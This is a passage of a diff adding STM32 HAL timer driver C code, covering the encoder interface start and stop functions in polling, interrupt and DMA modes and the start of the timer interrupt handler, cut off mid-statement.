+ TIM_CHANNEL_STATE_SET(htim, TIM_CHANNEL_1, HAL_TIM_CHANNEL_STATE_RESET); + TIM_CHANNEL_STATE_SET(htim, TIM_CHANNEL_2, HAL_TIM_CHANNEL_STATE_RESET); + TIM_CHANNEL_N_STATE_SET(htim, TIM_CHANNEL_1, HAL_TIM_CHANNEL_STATE_RESET); + TIM_CHANNEL_N_STATE_SET(htim, TIM_CHANNEL_2, HAL_TIM_CHANNEL_STATE_RESET); + + /* Change TIM state */ + htim->State = HAL_TIM_STATE_RESET; + + /* Release Lock */ + __HAL_UNLOCK(htim); + + return HAL_OK; +} + +/** + * @brief Initializes the TIM Encoder Interface MSP. + * @param htim TIM Encoder Interface handle + * @retval None + */ +__weak void HAL_TIM_Encoder_MspInit(TIM_HandleTypeDef *htim) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(htim); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_TIM_Encoder_MspInit could be implemented in the user file + */ +} + +/** + * @brief DeInitializes TIM Encoder Interface MSP. + * @param htim TIM Encoder Interface handle + * @retval None + */ +__weak void HAL_TIM_Encoder_MspDeInit(TIM_HandleTypeDef *htim) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(htim); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_TIM_Encoder_MspDeInit could be implemented in the user file + */ +} + +/** + * @brief Starts the TIM Encoder Interface. + * @param htim TIM Encoder Interface handle + * @param Channel TIM Channels to be enabled + * This parameter can be one of the following values: + * @arg TIM_CHANNEL_1: TIM Channel 1 selected + * @arg TIM_CHANNEL_2: TIM Channel 2 selected + * @arg TIM_CHANNEL_ALL: TIM Channel 1 and TIM Channel 2 are selected + * @retval HAL status + */ +HAL_StatusTypeDef HAL_TIM_Encoder_Start(TIM_HandleTypeDef *htim, uint32_t Channel) +{ + HAL_TIM_ChannelStateTypeDef channel_1_state = TIM_CHANNEL_STATE_GET(htim, TIM_CHANNEL_1); + HAL_TIM_ChannelStateTypeDef channel_2_state = TIM_CHANNEL_STATE_GET(htim, TIM_CHANNEL_2); + HAL_TIM_ChannelStateTypeDef complementary_channel_1_state = TIM_CHANNEL_N_STATE_GET(htim, TIM_CHANNEL_1); + HAL_TIM_ChannelStateTypeDef complementary_channel_2_state = TIM_CHANNEL_N_STATE_GET(htim, TIM_CHANNEL_2); + + /* Check the parameters */ + assert_param(IS_TIM_ENCODER_INTERFACE_INSTANCE(htim->Instance)); + + /* Set the TIM channel(s) state */ + if (Channel == TIM_CHANNEL_1) + { + if ((channel_1_state != HAL_TIM_CHANNEL_STATE_READY) + || (complementary_channel_1_state != HAL_TIM_CHANNEL_STATE_READY)) + { + return HAL_ERROR; + } + else + { + TIM_CHANNEL_STATE_SET(htim, TIM_CHANNEL_1, HAL_TIM_CHANNEL_STATE_BUSY); + TIM_CHANNEL_N_STATE_SET(htim, TIM_CHANNEL_1, HAL_TIM_CHANNEL_STATE_BUSY); + } + } + else if (Channel == TIM_CHANNEL_2) + { + if ((channel_2_state != HAL_TIM_CHANNEL_STATE_READY) + || (complementary_channel_2_state != HAL_TIM_CHANNEL_STATE_READY)) + { + return HAL_ERROR; + } + else + { + TIM_CHANNEL_STATE_SET(htim, TIM_CHANNEL_2, HAL_TIM_CHANNEL_STATE_BUSY); + TIM_CHANNEL_N_STATE_SET(htim, TIM_CHANNEL_2, HAL_TIM_CHANNEL_STATE_BUSY); + } + } + else + { + if ((channel_1_state != HAL_TIM_CHANNEL_STATE_READY) + || (channel_2_state != HAL_TIM_CHANNEL_STATE_READY) + || (complementary_channel_1_state != HAL_TIM_CHANNEL_STATE_READY) + || (complementary_channel_2_state != HAL_TIM_CHANNEL_STATE_READY)) + { + return HAL_ERROR; + } + else + { + TIM_CHANNEL_STATE_SET(htim, TIM_CHANNEL_1, HAL_TIM_CHANNEL_STATE_BUSY); + TIM_CHANNEL_STATE_SET(htim, TIM_CHANNEL_2, HAL_TIM_CHANNEL_STATE_BUSY); + TIM_CHANNEL_N_STATE_SET(htim, TIM_CHANNEL_1, HAL_TIM_CHANNEL_STATE_BUSY); + TIM_CHANNEL_N_STATE_SET(htim, TIM_CHANNEL_2, HAL_TIM_CHANNEL_STATE_BUSY); + } + } + + /* Enable the encoder interface channels */ + switch (Channel) + { + case TIM_CHANNEL_1: + { + TIM_CCxChannelCmd(htim->Instance, TIM_CHANNEL_1, TIM_CCx_ENABLE); + break; + } + + case TIM_CHANNEL_2: + { + TIM_CCxChannelCmd(htim->Instance, TIM_CHANNEL_2, TIM_CCx_ENABLE); + break; + } + + default : + { + TIM_CCxChannelCmd(htim->Instance, TIM_CHANNEL_1, TIM_CCx_ENABLE); + TIM_CCxChannelCmd(htim->Instance, TIM_CHANNEL_2, TIM_CCx_ENABLE); + break; + } + } + /* Enable the Peripheral */ + __HAL_TIM_ENABLE(htim); + + /* Return function status */ + return HAL_OK; +} + +/** + * @brief Stops the TIM Encoder Interface. + * @param htim TIM Encoder Interface handle + * @param Channel TIM Channels to be disabled + * This parameter can be one of the following values: + * @arg TIM_CHANNEL_1: TIM Channel 1 selected + * @arg TIM_CHANNEL_2: TIM Channel 2 selected + * @arg TIM_CHANNEL_ALL: TIM Channel 1 and TIM Channel 2 are selected + * @retval HAL status + */ +HAL_StatusTypeDef HAL_TIM_Encoder_Stop(TIM_HandleTypeDef *htim, uint32_t Channel) +{ + /* Check the parameters */ + assert_param(IS_TIM_ENCODER_INTERFACE_INSTANCE(htim->Instance)); + + /* Disable the Input Capture channels 1 and 2 + (in the EncoderInterface the two possible channels that can be used are TIM_CHANNEL_1 and TIM_CHANNEL_2) */ + switch (Channel) + { + case TIM_CHANNEL_1: + { + TIM_CCxChannelCmd(htim->Instance, TIM_CHANNEL_1, TIM_CCx_DISABLE); + break; + } + + case TIM_CHANNEL_2: + { + TIM_CCxChannelCmd(htim->Instance, TIM_CHANNEL_2, TIM_CCx_DISABLE); + break; + } + + default : + { + TIM_CCxChannelCmd(htim->Instance, TIM_CHANNEL_1, TIM_CCx_DISABLE); + TIM_CCxChannelCmd(htim->Instance, TIM_CHANNEL_2, TIM_CCx_DISABLE); + break; + } + } + + /* Disable the Peripheral */ + __HAL_TIM_DISABLE(htim); + + /* Set the TIM channel(s) state */ + if ((Channel == TIM_CHANNEL_1) || (Channel == TIM_CHANNEL_2)) + { + TIM_CHANNEL_STATE_SET(htim, Channel, HAL_TIM_CHANNEL_STATE_READY); + TIM_CHANNEL_N_STATE_SET(htim, Channel, HAL_TIM_CHANNEL_STATE_READY); + } + else + { + TIM_CHANNEL_STATE_SET(htim, TIM_CHANNEL_1, HAL_TIM_CHANNEL_STATE_READY); + TIM_CHANNEL_STATE_SET(htim, TIM_CHANNEL_2, HAL_TIM_CHANNEL_STATE_READY); + TIM_CHANNEL_N_STATE_SET(htim, TIM_CHANNEL_1, HAL_TIM_CHANNEL_STATE_READY); + TIM_CHANNEL_N_STATE_SET(htim, TIM_CHANNEL_2, HAL_TIM_CHANNEL_STATE_READY); + } + + /* Return function status */ + return HAL_OK; +} + +/** + * @brief Starts the TIM Encoder Interface in interrupt mode. + * @param htim TIM Encoder Interface handle + * @param Channel TIM Channels to be enabled + * This parameter can be one of the following values: + * @arg TIM_CHANNEL_1: TIM Channel 1 selected + * @arg TIM_CHANNEL_2: TIM Channel 2 selected + * @arg TIM_CHANNEL_ALL: TIM Channel 1 and TIM Channel 2 are selected + * @retval HAL status + */ +HAL_StatusTypeDef HAL_TIM_Encoder_Start_IT(TIM_HandleTypeDef *htim, uint32_t Channel) +{ + HAL_TIM_ChannelStateTypeDef channel_1_state = TIM_CHANNEL_STATE_GET(htim, TIM_CHANNEL_1); + HAL_TIM_ChannelStateTypeDef channel_2_state = TIM_CHANNEL_STATE_GET(htim, TIM_CHANNEL_2); + HAL_TIM_ChannelStateTypeDef complementary_channel_1_state = TIM_CHANNEL_N_STATE_GET(htim, TIM_CHANNEL_1); + HAL_TIM_ChannelStateTypeDef complementary_channel_2_state = TIM_CHANNEL_N_STATE_GET(htim, TIM_CHANNEL_2); + + /* Check the parameters */ + assert_param(IS_TIM_ENCODER_INTERFACE_INSTANCE(htim->Instance)); + + /* Set the TIM channel(s) state */ + if (Channel == TIM_CHANNEL_1) + { + if ((channel_1_state != HAL_TIM_CHANNEL_STATE_READY) + || (complementary_channel_1_state != HAL_TIM_CHANNEL_STATE_READY)) + { + return HAL_ERROR; + } + else + { + TIM_CHANNEL_STATE_SET(htim, TIM_CHANNEL_1, HAL_TIM_CHANNEL_STATE_BUSY); + TIM_CHANNEL_N_STATE_SET(htim, TIM_CHANNEL_1, HAL_TIM_CHANNEL_STATE_BUSY); + } + } + else if (Channel == TIM_CHANNEL_2) + { + if ((channel_2_state != HAL_TIM_CHANNEL_STATE_READY) + || (complementary_channel_2_state != HAL_TIM_CHANNEL_STATE_READY)) + { + return HAL_ERROR; + } + else + { + TIM_CHANNEL_STATE_SET(htim, TIM_CHANNEL_2, HAL_TIM_CHANNEL_STATE_BUSY); + TIM_CHANNEL_N_STATE_SET(htim, TIM_CHANNEL_2, HAL_TIM_CHANNEL_STATE_BUSY); + } + } + else + { + if ((channel_1_state != HAL_TIM_CHANNEL_STATE_READY) + || (channel_2_state != HAL_TIM_CHANNEL_STATE_READY) + || (complementary_channel_1_state != HAL_TIM_CHANNEL_STATE_READY) + || (complementary_channel_2_state != HAL_TIM_CHANNEL_STATE_READY)) + { + return HAL_ERROR; + } + else + { + TIM_CHANNEL_STATE_SET(htim, TIM_CHANNEL_1, HAL_TIM_CHANNEL_STATE_BUSY); + TIM_CHANNEL_STATE_SET(htim, TIM_CHANNEL_2, HAL_TIM_CHANNEL_STATE_BUSY); + TIM_CHANNEL_N_STATE_SET(htim, TIM_CHANNEL_1, HAL_TIM_CHANNEL_STATE_BUSY); + TIM_CHANNEL_N_STATE_SET(htim, TIM_CHANNEL_2, HAL_TIM_CHANNEL_STATE_BUSY); + } + } + + /* Enable the encoder interface channels */ + /* Enable the capture compare Interrupts 1 and/or 2 */ + switch (Channel) + { + case TIM_CHANNEL_1: + { + TIM_CCxChannelCmd(htim->Instance, TIM_CHANNEL_1, TIM_CCx_ENABLE); + __HAL_TIM_ENABLE_IT(htim, TIM_IT_CC1); + break; + } + + case TIM_CHANNEL_2: + { + TIM_CCxChannelCmd(htim->Instance, TIM_CHANNEL_2, TIM_CCx_ENABLE); + __HAL_TIM_ENABLE_IT(htim, TIM_IT_CC2); + break; + } + + default : + { + TIM_CCxChannelCmd(htim->Instance, TIM_CHANNEL_1, TIM_CCx_ENABLE); + TIM_CCxChannelCmd(htim->Instance, TIM_CHANNEL_2, TIM_CCx_ENABLE); + __HAL_TIM_ENABLE_IT(htim, TIM_IT_CC1); + __HAL_TIM_ENABLE_IT(htim, TIM_IT_CC2); + break; + } + } + + /* Enable the Peripheral */ + __HAL_TIM_ENABLE(htim); + + /* Return function status */ + return HAL_OK; +} + +/** + * @brief Stops the TIM Encoder Interface in interrupt mode. + * @param htim TIM Encoder Interface handle + * @param Channel TIM Channels to be disabled + * This parameter can be one of the following values: + * @arg TIM_CHANNEL_1: TIM Channel 1 selected + * @arg TIM_CHANNEL_2: TIM Channel 2 selected + * @arg TIM_CHANNEL_ALL: TIM Channel 1 and TIM Channel 2 are selected + * @retval HAL status + */ +HAL_StatusTypeDef HAL_TIM_Encoder_Stop_IT(TIM_HandleTypeDef *htim, uint32_t Channel) +{ + /* Check the parameters */ + assert_param(IS_TIM_ENCODER_INTERFACE_INSTANCE(htim->Instance)); + + /* Disable the Input Capture channels 1 and 2 + (in the EncoderInterface the two possible channels that can be used are TIM_CHANNEL_1 and TIM_CHANNEL_2) */ + if (Channel == TIM_CHANNEL_1) + { + TIM_CCxChannelCmd(htim->Instance, TIM_CHANNEL_1, TIM_CCx_DISABLE); + + /* Disable the capture compare Interrupts 1 */ + __HAL_TIM_DISABLE_IT(htim, TIM_IT_CC1); + } + else if (Channel == TIM_CHANNEL_2) + { + TIM_CCxChannelCmd(htim->Instance, TIM_CHANNEL_2, TIM_CCx_DISABLE); + + /* Disable the capture compare Interrupts 2 */ + __HAL_TIM_DISABLE_IT(htim, TIM_IT_CC2); + } + else + { + TIM_CCxChannelCmd(htim->Instance, TIM_CHANNEL_1, TIM_CCx_DISABLE); + TIM_CCxChannelCmd(htim->Instance, TIM_CHANNEL_2, TIM_CCx_DISABLE); + + /* Disable the capture compare Interrupts 1 and 2 */ + __HAL_TIM_DISABLE_IT(htim, TIM_IT_CC1); + __HAL_TIM_DISABLE_IT(htim, TIM_IT_CC2); + } + + /* Disable the Peripheral */ + __HAL_TIM_DISABLE(htim); + + /* Set the TIM channel(s) state */ + if ((Channel == TIM_CHANNEL_1) || (Channel == TIM_CHANNEL_2)) + { + TIM_CHANNEL_STATE_SET(htim, Channel, HAL_TIM_CHANNEL_STATE_READY); + TIM_CHANNEL_N_STATE_SET(htim, Channel, HAL_TIM_CHANNEL_STATE_READY); + } + else + { + TIM_CHANNEL_STATE_SET(htim, TIM_CHANNEL_1, HAL_TIM_CHANNEL_STATE_READY); + TIM_CHANNEL_STATE_SET(htim, TIM_CHANNEL_2, HAL_TIM_CHANNEL_STATE_READY); + TIM_CHANNEL_N_STATE_SET(htim, TIM_CHANNEL_1, HAL_TIM_CHANNEL_STATE_READY); + TIM_CHANNEL_N_STATE_SET(htim, TIM_CHANNEL_2, HAL_TIM_CHANNEL_STATE_READY); + } + + /* Return function status */ + return HAL_OK; +} + +/** + * @brief Starts the TIM Encoder Interface in DMA mode. + * @param htim TIM Encoder Interface handle + * @param Channel TIM Channels to be enabled + * This parameter can be one of the following values: + * @arg TIM_CHANNEL_1: TIM Channel 1 selected + * @arg TIM_CHANNEL_2: TIM Channel 2 selected + * @arg TIM_CHANNEL_ALL: TIM Channel 1 and TIM Channel 2 are selected + * @param pData1 The destination Buffer address for IC1. + * @param pData2 The destination Buffer address for IC2. + * @param Length The length of data to be transferred from TIM peripheral to memory. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_TIM_Encoder_Start_DMA(TIM_HandleTypeDef *htim, uint32_t Channel, uint32_t *pData1, + uint32_t *pData2, uint16_t Length) +{ + HAL_TIM_ChannelStateTypeDef channel_1_state = TIM_CHANNEL_STATE_GET(htim, TIM_CHANNEL_1); + HAL_TIM_ChannelStateTypeDef channel_2_state = TIM_CHANNEL_STATE_GET(htim, TIM_CHANNEL_2); + HAL_TIM_ChannelStateTypeDef complementary_channel_1_state = TIM_CHANNEL_N_STATE_GET(htim, TIM_CHANNEL_1); + HAL_TIM_ChannelStateTypeDef complementary_channel_2_state = TIM_CHANNEL_N_STATE_GET(htim, TIM_CHANNEL_2); + + /* Check the parameters */ + assert_param(IS_TIM_ENCODER_INTERFACE_INSTANCE(htim->Instance)); + + /* Set the TIM channel(s) state */ + if (Channel == TIM_CHANNEL_1) + { + if ((channel_1_state == HAL_TIM_CHANNEL_STATE_BUSY) + || (complementary_channel_1_state == HAL_TIM_CHANNEL_STATE_BUSY)) + { + return HAL_BUSY; + } + else if ((channel_1_state == HAL_TIM_CHANNEL_STATE_READY) + && (complementary_channel_1_state == HAL_TIM_CHANNEL_STATE_READY)) + { + if ((pData1 == NULL) && (Length > 0U)) + { + return HAL_ERROR; + } + else + { + TIM_CHANNEL_STATE_SET(htim, TIM_CHANNEL_1, HAL_TIM_CHANNEL_STATE_BUSY); + TIM_CHANNEL_N_STATE_SET(htim, TIM_CHANNEL_1, HAL_TIM_CHANNEL_STATE_BUSY); + } + } + else + { + return HAL_ERROR; + } + } + else if (Channel == TIM_CHANNEL_2) + { + if ((channel_2_state == HAL_TIM_CHANNEL_STATE_BUSY) + || (complementary_channel_2_state == HAL_TIM_CHANNEL_STATE_BUSY)) + { + return HAL_BUSY; + } + else if ((channel_2_state == HAL_TIM_CHANNEL_STATE_READY) + && (complementary_channel_2_state == HAL_TIM_CHANNEL_STATE_READY)) + { + if ((pData2 == NULL) && (Length > 0U)) + { + return HAL_ERROR; + } + else + { + TIM_CHANNEL_STATE_SET(htim, TIM_CHANNEL_2, HAL_TIM_CHANNEL_STATE_BUSY); + TIM_CHANNEL_N_STATE_SET(htim, TIM_CHANNEL_2, HAL_TIM_CHANNEL_STATE_BUSY); + } + } + else + { + return HAL_ERROR; + } + } + else + { + if ((channel_1_state == HAL_TIM_CHANNEL_STATE_BUSY) + || (channel_2_state == HAL_TIM_CHANNEL_STATE_BUSY) + || (complementary_channel_1_state == HAL_TIM_CHANNEL_STATE_BUSY) + || (complementary_channel_2_state == HAL_TIM_CHANNEL_STATE_BUSY)) + { + return HAL_BUSY; + } + else if ((channel_1_state == HAL_TIM_CHANNEL_STATE_READY) + && (channel_2_state == HAL_TIM_CHANNEL_STATE_READY) + && (complementary_channel_1_state == HAL_TIM_CHANNEL_STATE_READY) + && (complementary_channel_2_state == HAL_TIM_CHANNEL_STATE_READY)) + { + if ((((pData1 == NULL) || (pData2 == NULL))) && (Length > 0U)) + { + return HAL_ERROR; + } + else + { + TIM_CHANNEL_STATE_SET(htim, TIM_CHANNEL_1, HAL_TIM_CHANNEL_STATE_BUSY); + TIM_CHANNEL_STATE_SET(htim, TIM_CHANNEL_2, HAL_TIM_CHANNEL_STATE_BUSY); + TIM_CHANNEL_N_STATE_SET(htim, TIM_CHANNEL_1, HAL_TIM_CHANNEL_STATE_BUSY); + TIM_CHANNEL_N_STATE_SET(htim, TIM_CHANNEL_2, HAL_TIM_CHANNEL_STATE_BUSY); + } + } + else + { + return HAL_ERROR; + } + } + + switch (Channel) + { + case TIM_CHANNEL_1: + { + /* Set the DMA capture callbacks */ + htim->hdma[TIM_DMA_ID_CC1]->XferCpltCallback = TIM_DMACaptureCplt; + htim->hdma[TIM_DMA_ID_CC1]->XferHalfCpltCallback = TIM_DMACaptureHalfCplt; + + /* Set the DMA error callback */ + htim->hdma[TIM_DMA_ID_CC1]->XferErrorCallback = TIM_DMAError ; + + /* Enable the DMA stream */ + if (HAL_DMA_Start_IT(htim->hdma[TIM_DMA_ID_CC1], (uint32_t)&htim->Instance->CCR1, (uint32_t)pData1, + Length) != HAL_OK) + { + /* Return error status */ + return HAL_ERROR; + } + /* Enable the TIM Input Capture DMA request */ + __HAL_TIM_ENABLE_DMA(htim, TIM_DMA_CC1); + + /* Enable the Capture compare channel */ + TIM_CCxChannelCmd(htim->Instance, TIM_CHANNEL_1, TIM_CCx_ENABLE); + + /* Enable the Peripheral */ + __HAL_TIM_ENABLE(htim); + + break; + } + + case TIM_CHANNEL_2: + { + /* Set the DMA capture callbacks */ + htim->hdma[TIM_DMA_ID_CC2]->XferCpltCallback = TIM_DMACaptureCplt; + htim->hdma[TIM_DMA_ID_CC2]->XferHalfCpltCallback = TIM_DMACaptureHalfCplt; + + /* Set the DMA error callback */ + htim->hdma[TIM_DMA_ID_CC2]->XferErrorCallback = TIM_DMAError; + /* Enable the DMA stream */ + if (HAL_DMA_Start_IT(htim->hdma[TIM_DMA_ID_CC2], (uint32_t)&htim->Instance->CCR2, (uint32_t)pData2, + Length) != HAL_OK) + { + /* Return error status */ + return HAL_ERROR; + } + /* Enable the TIM Input Capture DMA request */ + __HAL_TIM_ENABLE_DMA(htim, TIM_DMA_CC2); + + /* Enable the Capture compare channel */ + TIM_CCxChannelCmd(htim->Instance, TIM_CHANNEL_2, TIM_CCx_ENABLE); + + /* Enable the Peripheral */ + __HAL_TIM_ENABLE(htim); + + break; + } + + default: + { + /* Set the DMA capture callbacks */ + htim->hdma[TIM_DMA_ID_CC1]->XferCpltCallback = TIM_DMACaptureCplt; + htim->hdma[TIM_DMA_ID_CC1]->XferHalfCpltCallback = TIM_DMACaptureHalfCplt; + + /* Set the DMA error callback */ + htim->hdma[TIM_DMA_ID_CC1]->XferErrorCallback = TIM_DMAError ; + + /* Enable the DMA stream */ + if (HAL_DMA_Start_IT(htim->hdma[TIM_DMA_ID_CC1], (uint32_t)&htim->Instance->CCR1, (uint32_t)pData1, + Length) != HAL_OK) + { + /* Return error status */ + return HAL_ERROR; + } + + /* Set the DMA capture callbacks */ + htim->hdma[TIM_DMA_ID_CC2]->XferCpltCallback = TIM_DMACaptureCplt; + htim->hdma[TIM_DMA_ID_CC2]->XferHalfCpltCallback = TIM_DMACaptureHalfCplt; + + /* Set the DMA error callback */ + htim->hdma[TIM_DMA_ID_CC2]->XferErrorCallback = TIM_DMAError ; + + /* Enable the DMA stream */ + if (HAL_DMA_Start_IT(htim->hdma[TIM_DMA_ID_CC2], (uint32_t)&htim->Instance->CCR2, (uint32_t)pData2, + Length) != HAL_OK) + { + /* Return error status */ + return HAL_ERROR; + } + + /* Enable the TIM Input Capture DMA request */ + __HAL_TIM_ENABLE_DMA(htim, TIM_DMA_CC1); + /* Enable the TIM Input Capture DMA request */ + __HAL_TIM_ENABLE_DMA(htim, TIM_DMA_CC2); + + /* Enable the Capture compare channel */ + TIM_CCxChannelCmd(htim->Instance, TIM_CHANNEL_1, TIM_CCx_ENABLE); + TIM_CCxChannelCmd(htim->Instance, TIM_CHANNEL_2, TIM_CCx_ENABLE); + + /* Enable the Peripheral */ + __HAL_TIM_ENABLE(htim); + + break; + } + } + + /* Return function status */ + return HAL_OK; +} + +/** + * @brief Stops the TIM Encoder Interface in DMA mode. + * @param htim TIM Encoder Interface handle + * @param Channel TIM Channels to be enabled + * This parameter can be one of the following values: + * @arg TIM_CHANNEL_1: TIM Channel 1 selected + * @arg TIM_CHANNEL_2: TIM Channel 2 selected + * @arg TIM_CHANNEL_ALL: TIM Channel 1 and TIM Channel 2 are selected + * @retval HAL status + */ +HAL_StatusTypeDef HAL_TIM_Encoder_Stop_DMA(TIM_HandleTypeDef *htim, uint32_t Channel) +{ + /* Check the parameters */ + assert_param(IS_TIM_ENCODER_INTERFACE_INSTANCE(htim->Instance)); + + /* Disable the Input Capture channels 1 and 2 + (in the EncoderInterface the two possible channels that can be used are TIM_CHANNEL_1 and TIM_CHANNEL_2) */ + if (Channel == TIM_CHANNEL_1) + { + TIM_CCxChannelCmd(htim->Instance, TIM_CHANNEL_1, TIM_CCx_DISABLE); + + /* Disable the capture compare DMA Request 1 */ + __HAL_TIM_DISABLE_DMA(htim, TIM_DMA_CC1); + (void)HAL_DMA_Abort_IT(htim->hdma[TIM_DMA_ID_CC1]); + } + else if (Channel == TIM_CHANNEL_2) + { + TIM_CCxChannelCmd(htim->Instance, TIM_CHANNEL_2, TIM_CCx_DISABLE); + + /* Disable the capture compare DMA Request 2 */ + __HAL_TIM_DISABLE_DMA(htim, TIM_DMA_CC2); + (void)HAL_DMA_Abort_IT(htim->hdma[TIM_DMA_ID_CC2]); + } + else + { + TIM_CCxChannelCmd(htim->Instance, TIM_CHANNEL_1, TIM_CCx_DISABLE); + TIM_CCxChannelCmd(htim->Instance, TIM_CHANNEL_2, TIM_CCx_DISABLE); + + /* Disable the capture compare DMA Request 1 and 2 */ + __HAL_TIM_DISABLE_DMA(htim, TIM_DMA_CC1); + __HAL_TIM_DISABLE_DMA(htim, TIM_DMA_CC2); + (void)HAL_DMA_Abort_IT(htim->hdma[TIM_DMA_ID_CC1]); + (void)HAL_DMA_Abort_IT(htim->hdma[TIM_DMA_ID_CC2]); + } + + /* Disable the Peripheral */ + __HAL_TIM_DISABLE(htim); + + /* Set the TIM channel(s) state */ + if ((Channel == TIM_CHANNEL_1) || (Channel == TIM_CHANNEL_2)) + { + TIM_CHANNEL_STATE_SET(htim, Channel, HAL_TIM_CHANNEL_STATE_READY); + TIM_CHANNEL_N_STATE_SET(htim, Channel, HAL_TIM_CHANNEL_STATE_READY); + } + else + { + TIM_CHANNEL_STATE_SET(htim, TIM_CHANNEL_1, HAL_TIM_CHANNEL_STATE_READY); + TIM_CHANNEL_STATE_SET(htim, TIM_CHANNEL_2, HAL_TIM_CHANNEL_STATE_READY); + TIM_CHANNEL_N_STATE_SET(htim, TIM_CHANNEL_1, HAL_TIM_CHANNEL_STATE_READY); + TIM_CHANNEL_N_STATE_SET(htim, TIM_CHANNEL_2, HAL_TIM_CHANNEL_STATE_READY); + } + + /* Return function status */ + return HAL_OK; +} + +/** + * @} + */ +/** @defgroup TIM_Exported_Functions_Group7 TIM IRQ handler management + * @brief TIM IRQ handler management + * +@verbatim + ============================================================================== + ##### IRQ handler management ##### + ============================================================================== + [..] + This section provides Timer IRQ handler function. + +@endverbatim + * @{ + */ +/** + * @brief This function handles TIM interrupts requests. + * @param htim TIM handle + * @retval None + */ +void HAL_TIM_IRQHandler(TIM_HandleTypeDef *htim) +{ + /* Capture compare 1 event */ + if (__HAL_TIM_GET_FLAG(htim, TIM_FLAG_CC1) != RESET) + { + if (__HAL_TIM_GET_IT_SOURCE(htim, TIM_IT_CC1) != RESET) + { + { + __HAL_TIM_CLEAR_IT(htim, TIM_IT_CC1); + htim->Channel = HAL_TIM_ACTIVE_CHANNEL_1; + + /* Input capture event */ + if ((htim->Instance->CCMR1 & TIM_CCMR1_CC1S) != 0x00U) + { +#if (USE_HAL_TIM_REGISTER_CALLBACKS == 1) + htim->IC_CaptureCallback(htim); +#else + HAL_TIM_IC_CaptureCallback(htim); +#endif /* USE_HAL_TIM_REGISTER_CALLBACKS */ + } + /* Output compare event */ + else + { +#if (USE_HAL_TIM_REGISTER_CALLBACKS == 1) + htim->OC_DelayElapsedCallback(htim); + htim->PWM_PulseFinishedCallback(htim); +#else + HAL_TIM_OC_DelayElapsedCallback(htim); + HAL_TIM_PWM_PulseFinishedCallback(htim); +#endif /* USE_HAL_TIM_REGISTER_CALLBACKS */ + } + htim->Channel = HAL_TIM_ACTIVE_CHANNEL_CLEARED; + } + } + } + /* Capture compare 2 event */ + if (__HAL_TIM_GET_FLAG(htim, TIM_FLAG_CC2) != RESET) + { + if (__HAL_TIM_GET_IT_SOURCE(htim, TIM_IT_CC2) != RESET) + { + __HAL_TIM_CLEAR_IT(htim, TIM_IT_CC2); + htim->Channel = HAL_TIM_ACTIVE_CHANNEL_2; + /* Input capture event */ + if ((htim->Instance->CCMR1 & TIM_CCMR1_CC2S) != 0x00U) + { +#if (USE_HAL_TIM_REGISTER_CALLBACKS == 1) + htim->IC_CaptureCallback(htim); +#else + HAL_TIM_IC_CaptureCallback(htim); +#endif /* USE_HAL_TIM_REGISTER_CALLBACKS */ + } + /* Output compare event */ + else + { +#if (USE_HAL_TIM_REGISTER_CALLBACKS == 1) + htim->OC_DelayElapsedCallback(htim); + htim->PWM_PulseFinishedCallback(htim); +#else + HAL_TIM_OC_DelayElapsedCallback(htim); + HAL_TIM_PWM_PulseFinishedCallback(htim); +#endif /* USE_HAL_TIM_REGISTER_CALLBACKS */ + } + htim->Channel = HAL_TIM_ACTIVE_CHANNEL_CLEARED; + } + } + /* Capture compare 3 event */ + if (__HAL_TIM_GET_FLAG(htim, TIM_FLAG_CC3) != RESET) + { + if (__HAL_TIM_GET_IT_SOURCE(htim, TIM_IT_CC3) != RESET) + { + __HAL_TIM_CLEAR_IT(htim, TIM_IT_CC3); + htim->Channel = HAL_TIM_ACTIVE_CHANNEL_3; + /* Input capture event */ + if ((htim->Instance->CCMR2 & TIM_CCMR2_CC3S) != 0x00U) + { +#if (USE_HAL_TIM_REGISTER_CALLBACKS == 1) + htim->IC_CaptureCallback(htim); +#else + HAL_TIM_IC_CaptureCallback(htim); +#endif /* USE_HAL_TIM_REGISTER_CALLBACKS */ + } + /* Output compare event */ + else + { +#if (USE_HAL_TIM_REGISTER_CALLBACKS == 1) + htim->OC_DelayElapsedCallback(htim); + htim->PWM_PulseFinishedCallback(htim); +#else + HAL_TIM_OC_DelayElapsedCallback(htim); + HAL_TIM_PWM_PulseFinishedCallback(htim); +#endif /* USE_HAL_TIM_REGISTER_CALLBACKS */ + } + htim->Channel = HAL_TIM_ACTIVE_CHANNEL_CLEARED; + } + } + /* Capture compare 4 event */ + if (__HAL_TIM_GET_FLAG(htim, TIM_FLAG_CC4) != RESET) + { + if (__HAL_TIM_GET_IT_SOURCE(htim, TIM_IT_CC4) != RESET) + { + __HAL_TIM_CLEAR_IT(htim, TIM_IT_CC4); + htim->Channel = HAL_TIM_ACTIVE_CHANNEL_4; + /* Input capture event */ + if ((htim->Instance->CCMR2 & TIM_CCMR2_CC4S) != 0x00U) + { +#if (USE_HAL_TIM_REGISTER_CALLBACKS == 1) + htim->IC_CaptureCallback(htim); +#else + HAL_TIM_IC_CaptureCallback(htim); +#endif /* USE_HAL_TIM_REGISTER_CALLBACKS */ + } + /* Output compare event */ + else + { +#if (USE_HAL_TIM_REGISTER_CALLBACKS == 1) + htim->OC_DelayElapsedCallback(htim); + htim->PWM_PulseFinishedCallback(htim); +#else + HAL_TIM_OC_DelayElapsedCallback(htim); + HAL_TIM_PWM_PulseFinishedCallback(htim); +#endif /* USE_HAL_TIM_REGISTER_CALLBACKS */ + } + htim->Channel = HAL_TIM_ACTIVE_CHANNEL_CLEARED; + } + } + /* TIM Update event */ + if (__HAL_TIM_GET_FLAG(htim, TIM_FLAG_UPDATE) != RESET) + { + if (__HAL_TIM_GET_IT_SOURCE(htim, TIM_IT_UPDATE) != RESET) + { + __HAL_TIM_CLEAR_IT(htim, TIM_IT_UPDATE); +#if (USE_HAL_TIM_REGISTER_CALLBACKS == 1) + htim->PeriodElapsedCallback(htim); +#else + HAL_TIM_PeriodElapsedCallback(htim); +#endif /* USE_HAL_TIM_REGISTER_CALLBACKS */ + } + } + /* TIM Break input event */ + if (__HAL_TIM_GET_FLAG(htim, TIM_FLAG_BREAK) != RESET) + { + if (__HAL_TIM_GET_IT_SOURCE(htim, TIM_IT_BREAK) != RESET) + { + __HAL_TIM_CLEAR_IT(htim, TIM_IT_BREAK); +#if (USE_HAL_TIM_REGISTER_CALLBACKS == 1) + htim->BreakCallback(htim); +#else + 